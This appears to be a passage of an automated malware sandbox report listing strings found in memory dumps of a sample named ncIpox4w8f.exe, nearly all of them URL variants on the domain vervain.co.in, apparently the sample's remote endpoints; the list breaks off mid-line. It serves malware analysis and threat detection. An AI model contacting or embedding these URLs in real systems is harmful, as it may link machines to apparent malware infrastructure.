                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266148150.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e
                Source: ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskity
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskitywdm
                Source: ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskny
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe
                Source: ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskust
                Source: ncIpox4w8f.exe, 00000000.00000003.340893762.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaima
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk
                Source: ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1
                Source: ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk2
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk24e
                Source: ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y
                Source: ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk4.1.1
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.344946189.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskity
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskitywdm
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskny
                Source: ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe
                Source: ncIpox4w8f.exe, 00000000.00000003.303406339.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/E
                Source: ncIpox4w8f.exe, 00000000.00000003.313047462.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280241715.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/K
                Source: ncIpox4w8f.exe, 00000000.00000003.401161238.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.405146329.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382108941.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416691334.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.435949378.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.393118648.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.411977070.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443210600.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384479510.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433570492.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.483953097.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.440772986.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/N
                Source: ncIpox4w8f.exe, 00000000.00000003.266218899.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.313047462.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/a
                Source: ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2t
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y
                Source: ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskity
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 